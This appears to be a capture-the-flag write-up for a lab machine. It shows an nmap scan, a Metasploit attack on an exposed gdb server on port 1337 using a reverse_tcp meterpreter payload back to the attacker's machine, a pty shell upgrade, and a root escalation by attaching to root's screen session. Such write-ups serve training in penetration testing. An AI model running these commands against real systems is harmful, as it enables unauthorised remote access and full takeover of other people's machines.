Let's start with nmap
nmap -sC -sV -p- targetIP
-p- means scan all 65535 ports
We find port 1337 open.
port 1337 is used for gdb server
We found a vulnerability for this :
Let's load metasploit using:
We need to set RHOSTS (remote host) with the IP of the target machine
set RHOSTS 10.129.96.68
RPORT (remote port) should be port 1337:
set RPORT 1337
We need to set LHOST (local host) with the IP of our machine. If you don't know the IP of your machine, type ifconfig
set LHOST 10.10.14.21
We also need to set the payload. By default it is linux/x86/meterpreter/reverse_tcp
we need to change it to linux/x64/meterpreter/reverse_tcp
set payload linux/x64/meterpreter/reverse_tcp
We also need to change target ID. By default it is set as target ID 0 for x86 (32-bit)
We need to change it to target ID 1 for x86_64 (64-bit)
set target 1
Now let's check again that we configured it properly:
Let's run the exploit
python3 -c 'import pty; pty.spawn("/bin/bash")'
We got the user flag!
Let's try privilege escalation with the usual
It is asking for a password and we don't have it:
Now let's try:
/usr/bin/screen -x root/root
we are now root!
We got the root flag!